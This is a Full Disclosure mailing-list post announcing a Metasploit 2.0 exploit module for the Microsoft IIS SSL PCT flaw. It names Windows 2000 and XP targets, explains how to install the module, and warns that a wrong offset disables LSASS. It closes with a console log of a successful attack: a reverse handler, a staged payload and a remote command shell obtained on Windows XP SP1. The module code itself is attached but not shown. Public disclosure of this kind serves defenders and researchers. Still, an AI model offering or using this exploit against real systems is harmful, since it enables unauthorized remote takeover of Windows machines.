Full Disclosure: Metasploit Microsoft IIS SSL PCT Module

[H D Moore <fdlist () digitaloffense net>]

Attached is an exploit module for version 2.0  of the Metasploit 
Framework. This module was based on Johnny Cyberpunk's code and includes 
some interesting improvements:

- Targets for Windows 2000 and Windows XP
- SSL request modified to allow exploitation on Windows XP
- Use of ExitThread allows repeatable exploitation
- Shellcode is limited to 1800 bytes or so...

To use this module, copy the attached file into the "exploits" 
subdirectory of the Metasploit Framework 2.0 installation. Win32 users 
should copy this file into $BASE\home\framework-2.0\exploits, where $BASE 
is where you installed the Framework.

If for some reason you don't have the Metasploit Framework installed, grab 
it from the following URL:

http://metasploit.com/projects/Framework/

If you specify the wrong offset, LSASS will stop functioning (but not 
crash!), so make sure you know your targets. This module has been tested 
against most Windows 2000 and Windows XP versions (English only, sorry).

Cheers,

HD and spoonm

______________________________________
msf iis5x_ssl_pct(winreverse_stg) > exploit
[*] Starting Reverse Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Sending 329 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.50.98:1038
[*] Sending Stage (115 bytes)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Attachment: iis5x_ssl_pct.pm
Description: